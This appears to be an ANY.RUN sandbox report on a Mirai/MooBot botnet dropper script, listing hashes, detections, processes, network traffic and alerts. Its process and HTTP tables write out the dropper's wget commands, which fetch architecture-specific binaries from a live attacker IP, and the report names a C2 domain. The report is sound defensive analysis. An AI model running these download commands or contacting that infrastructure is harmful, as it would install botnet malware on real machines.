File name:

16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a

Full analysis: https://app.any.run/tasks/c58e9c3f-c0ee-42eb-bbfc-5da258bceada
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: May 15, 2025, 22:20:47
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
moobot
auto
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

1EB5800FDC704D55B97095A4E8705370

SHA1:

638CA37DFB8D1F88F60A4840A31BB988353D9B87

SHA256:

16E9F3E4EAA19F7DF9C7377B7F701F93DA82F3BDFA523C0645CC31D2FB41225A

SSDEEP:

6:/QEpNq+58IBOGVYtBLghWDx3F5kJVKE6LsVKE6NiVVNDV2uVf6vGujh:/Ql28gOGCugqg5sguThON

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • BOTNET has been found (auto)

      • wget (PID: 40672)
      • wget (PID: 40666)
      • wget (PID: 40681)
      • wget (PID: 40694)
      • wget (PID: 40729)

    • MIRAI has been found (auto)

      • wget (PID: 40753)
      • wget (PID: 40817)
      • wget (PID: 40851)
      • wget (PID: 41159)
      • wget (PID: 41165)
      • wget (PID: 41171)

    • Connects to the CnC server

      • x86_64 (PID: 40686)
      • x86_64nk (deleted) (PID: 41156)

    • MIRAI has been detected (SURICATA)

      • x86_64 (PID: 40686)
      • x86_64nk (deleted) (PID: 41156)

  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 40658)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 40663)
      • snapd-desktop-integration (PID: 41176)

    • Executes commands using command-line interpreter

      • sudo (PID: 40661)

    • Uses wget to download content

      • bash (PID: 40663)

    • Checks DMI information (probably VM detection)

      • pipewire (PID: 40755)
      • pulseaudio (PID: 40757)
      • gnome-shell (PID: 40859)

    • Reads passwd file

      • pipewire-media-session (PID: 40756)
      • dbus-daemon (PID: 40767)
      • gdm-session-worker (PID: 40701)
      • pipewire (PID: 40755)
      • dbus-daemon (PID: 40788)
      • gnome-shell (PID: 40859)
      • dbus-daemon (PID: 40892)
      • gvfs-udisks2-volume-monitor (PID: 40903)
      • whoopsie (PID: 40907)
      • gsd-print-notifications (PID: 40984)
      • gsd-media-keys (PID: 40997)
      • gsd-power (PID: 41016)
      • ibus-daemon (PID: 40962)
      • ibus-daemon (PID: 41110)
      • whoopsie (PID: 41141)
      • snapd-desktop-integration (PID: 41176)
      • gdm-session-worker (PID: 41262)
      • gdm-session-worker (PID: 41269)

    • Reads /proc/mounts (likely used to find writable filesystems)

      • dbus-daemon (PID: 40767)
      • dbus-daemon (PID: 40788)
      • dbus-daemon (PID: 40892)
      • gnome-shell (PID: 40859)
      • gjs-console (PID: 40953)
      • gjs-console (PID: 41099)
      • snapd-desktop-integration (PID: 41176)

    • Potential Corporate Privacy Violation

      • wget (PID: 40666)
      • wget (PID: 40672)
      • wget (PID: 40681)
      • wget (PID: 40694)
      • wget (PID: 40753)
      • wget (PID: 40817)
      • wget (PID: 40729)
      • wget (PID: 40746)
      • wget (PID: 40851)
      • wget (PID: 41171)
      • wget (PID: 41165)
      • wget (PID: 41159)

    • Contacting a server suspected of hosting an CnC

      • x86_64 (PID: 40686)
      • x86_64nk (deleted) (PID: 41156)

    • Reads network configuration

      • bash (PID: 40663)

    • Gets active TCP connections

      • bash (PID: 40663)

    • Connects to unusual port

      • x86_64 (PID: 40686)
      • x86_64nk (deleted) (PID: 41156)

    • Check the Environment Variables Related to System Identification (os-release)

      • snapctl (PID: 41215)
      • snapctl (PID: 41220)
      • snapd-desktop-integration (PID: 41176)

  • INFO

    • Checks timezone

      • wget (PID: 40666)
      • wget (PID: 40672)
      • wget (PID: 40681)
      • wget (PID: 40694)
      • dbus-daemon (PID: 40767)
      • wget (PID: 40729)
      • gdm-session-worker (PID: 40701)
      • wget (PID: 40746)
      • wget (PID: 40753)
      • wget (PID: 40851)
      • whoopsie (PID: 40907)
      • gnome-shell (PID: 40859)
      • gnome-session-binary (PID: 40794)
      • wget (PID: 40817)
      • python3.10 (PID: 40844)
      • python3.10 (PID: 40845)
      • tracker-miner-fs-3 (PID: 40887)
      • gsd-color (PID: 40965)
      • spice-vdagent (PID: 41076)
      • python3.10 (PID: 40975)
      • gsd-print-notifications (PID: 40984)
      • whoopsie (PID: 41141)
      • wget (PID: 41159)
      • wget (PID: 41165)
      • wget (PID: 41171)
      • gdm-session-worker (PID: 41262)

    • Creates file in the temporary folder

      • gnome-shell (PID: 40859)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
473
Monitored processes
253
Malicious processes
18
Suspicious processes
5

Behavior graph

Click at the process to see the details
start dash no specs sudo no specs chown no specs chmod no specs sudo no specs systemctl no specs bash no specs locale-check no specs rm no specs #BOTNET wget chmod no specs bash no specs rm no specs rm no specs #BOTNET wget systemctl no specs chmod no specs bash no specs systemctl no specs rm no specs rm no specs #BOTNET wget systemctl no specs chmod no specs x86_64 no specs x86_64 no specs #MIRAI x86_64 rm no specs rm no specs #BOTNET wget fusermount3 no specs dash no specs gnome-session-ctl no specs gdm-session-worker no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gdbus no specs chmod no specs bash no specs rm no specs rm no specs #BOTNET wget dash no specs dash no specs systemd-user-runtime-dir no specs systemd no specs systemd no specs systemd no specs systemd no specs 30-systemd-environment-d-generator no specs systemd-xdg-autostart-generator no specs chmod no specs bash no specs rm no specs rm no specs wget chmod no specs bash no specs rm no specs rm no specs #MIRAI wget systemctl no specs pipewire no specs pipewire-media-session no specs pulseaudio no specs snap-confine no specs tracker-extract-3 no specs gdm-wayland-session no specs dbus-daemon no specs snap-seccomp no specs dbus-run-session no specs gvfsd no specs dbus-daemon no specs xdg-document-portal no specs chmod no specs gnome-session-binary no specs gvfsd no specs gvfsd-fuse no specs fusermount3 no specs bash no specs xdg-permission-store no specs rm no specs rm no specs #MIRAI wget fusermount3 no specs snap-confine no specs snap-confine no specs session-migration no specs dash no specs snap-update-ns no specs gsettings no specs gst-plugin-scanner no specs gsettings no specs gst-plugin-scanner no specs python3.10 no specs python3.10 no specs chmod no specs bash no specs rm no specs rm no specs #MIRAI wget dash no specs gsettings no specs gsettings no specs gnome-shell no specs chmod no specs x86_64nk no specs dbus-daemon no specs tracker-miner-fs-3 no specs at-spi-bus-launcher no specs dbus-daemon no specs xwayland no specs gvfs-udisks2-volume-monitor no specs whoopsie no specs gvfs-mtp-volume-monitor no specs dpkg no specs systemd-localed no specs gvfs-gphoto2-volume-monitor no specs gvfs-goa-volume-monitor no specs dbus-daemon no specs goa-daemon no specs dbus-daemon no specs xdg-permission-store no specs dbus-daemon no specs goa-identity-service no specs gvfs-afc-volume-monitor no specs geoclue no specs dbus-daemon no specs dbus-daemon no specs gjs-console no specs gsd-sharing no specs at-spi2-registryd no specs gsd-wacom no specs ibus-daemon no specs gsd-color no specs gsd-keyboard no specs python3.10 no specs gsd-print-notifications no specs gsd-rfkill no specs gsd-smartcard no specs gsd-datetime no specs gsd-media-keys no specs gsd-screensaver-proxy no specs gsd-sound no specs gsd-a11y-settings no specs gsd-housekeeping no specs gsd-power no specs systemd-hostnamed no specs dbus-daemon no specs false no specs ibus-engine-m17n no specs dash no specs xkbcomp no specs gsd-print-notifications no specs gsd-printer no specs fprintd no specs spice-vdagent no specs xbrlapi no specs ibus-engine-mozc no specs ibus-engine-unikey no specs dbus-daemon no specs gvfsd no specs ibus-dconf no specs dbus-daemon no specs ibus-portal no specs dbus-daemon no specs gjs-console no specs ibus-daemon no specs dash no specs ibus-dconf no specs ibus-daemon no specs xkbcomp no specs ibus-x11 no specs dbus-daemon no specs ibus-portal no specs ibus-engine-simple no specs whoopsie no specs dash no specs systemctl no specs dash no specs gnome-session-ctl no specs dbus-update-activation-environment no specs #MIRAI x86_64nk (deleted) rm no specs rm no specs #MIRAI wget chmod no specs bash no specs rm no specs rm no specs #MIRAI wget chmod no specs bash no specs rm no specs rm no specs #MIRAI wget chmod no specs bash no specs rm no specs snapd-desktop-integration no specs snap-seccomp no specs snap-confine no specs snap-confine no specs snap-update-ns no specs date no specs chmod no specs bash no specs cat no specs bash no specs cat no specs md5sum no specs md5sum no specs grep no specs snapctl no specs snapctl no specs xdg-user-dirs-update no specs bash no specs realpath no specs bash no specs bash no specs bash no specs realpath no specs realpath no specs realpath no specs bash no specs realpath no specs bash no specs realpath no specs bash no specs realpath no specs bash no specs realpath no specs ln no specs rm no specs ln no specs snapd-desktop-integration no specs tracker-extract-3 no specs gvfsd-metadata no specs gdm-session-worker no specs gdm-session-worker no specs

Process information

PID
CMD
Path
Indicators
Parent process
40657/bin/sh -c "sudo chown user /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a\.sh && chmod +x /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a\.sh && DISPLAY=:0 sudo -iu user /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a\.sh "/usr/bin/dashany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40658sudo chown user /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40659chown user /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40660chmod +x /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40661sudo -iu user /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40662systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40663-bash --login -c \/tmp\/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40664/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40665rm -rf mips/usr/bin/rmbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40666wget http://196.251.71.152/poiuhjksdh/mips/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
97
Text files
13
Unknown types
0

Dropped files

PID
Process
Filename
Type
40666wget/home/user/mips (deleted)binary
MD5:
SHA256:
40672wget/home/user/mipsel (deleted)binary
MD5:
SHA256:
40681wget/home/user/x86_64 (deleted)binary
MD5:
SHA256:
40694wget/home/user/arm7 (deleted)binary
MD5:
SHA256:
40729wget/home/user/arm6 (deleted)binary
MD5:
SHA256:
40746wget/home/user/arm5 (deleted)binary
MD5:
SHA256:
40753wget/home/user/mipsnk (deleted)binary
MD5:
SHA256:
40817wget/home/user/mipselnk (deleted)binary
MD5:
SHA256:
40828session-migration/var/lib/gdm3/.local/share/session_migration-(null)text
MD5:
SHA256:
40851wget/home/user/x86_64nk (deleted)binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
24
DNS requests
12
Threats
43

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
91.189.91.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
40666
wget
GET
200
196.251.71.152:80
http://196.251.71.152/poiuhjksdh/mips
unknown
unknown
40672
wget
GET
200
196.251.71.152:80
http://196.251.71.152/poiuhjksdh/mipsel
unknown
unknown
40681
wget
GET
200
196.251.71.152:80
http://196.251.71.152/poiuhjksdh/x86_64
unknown
unknown
40694
wget
GET
200
196.251.71.152:80
http://196.251.71.152/poiuhjksdh/arm7
unknown
unknown
40729
wget
GET
200
196.251.71.152:80
http://196.251.71.152/poiuhjksdh/arm6
unknown
unknown
40746
wget
GET
200
196.251.71.152:80
http://196.251.71.152/poiuhjksdh/arm5
unknown
unknown
40753
wget
GET
200
196.251.71.152:80
http://196.251.71.152/poiuhjksdh/mipsnk
unknown
unknown
40817
wget
GET
200
196.251.71.152:80
http://196.251.71.152/poiuhjksdh/mipselnk
unknown
unknown
41171
wget
GET
200
196.251.71.152:80
http://196.251.71.152/poiuhjksdh/arm5nk
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
484
avahi-daemon
224.0.0.251:5353
unknown
91.189.91.48:80
Canonical Group Limited
US
unknown
91.189.91.96:80
Canonical Group Limited
US
unknown
169.150.255.184:443
odrs.gnome.org
GB
whitelisted
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
40666
wget
196.251.71.152:80
SC
unknown
40672
wget
196.251.71.152:80
SC
unknown
40681
wget
196.251.71.152:80
SC
unknown
40694
wget
196.251.71.152:80
SC
unknown

DNS requests

Domain
IP
Reputation
odrs.gnome.org
  • 169.150.255.184
  • 207.211.211.27
  • 195.181.175.40
  • 212.102.56.178
  • 195.181.170.18
  • 169.150.255.181
  • 37.19.194.81
whitelisted
1527653184.rsc.cdn77.org
unknown
google.com
  • 142.250.186.142
  • 2a00:1450:4001:828::200e
whitelisted
api.snapcraft.io
  • 185.125.188.54
  • 185.125.188.59
  • 185.125.188.57
  • 185.125.188.58
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::2e6
whitelisted
fdh32fsdfhs.shop
  • 196.251.115.36
malicious
8.100.168.192.in-addr.arpa
unknown
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::98
  • 2001:67c:1562::23
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::196
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2a
whitelisted

Threats

PID
Process
Class
Message
40666
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
40672
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
40681
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
40686
x86_64
Malware Command and Control Activity Detected
ET MALWARE ELF/MooBot Mirai DDoS Variant Server Response
40686
x86_64
Malware Command and Control Activity Detected
ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M2 (Group String Len 2+)
40686
x86_64
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 41
40686
x86_64
Malware Command and Control Activity Detected
ET MALWARE ELF/MooBot Mirai DDoS Variant Server Response
40694
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
40729
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
40746
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a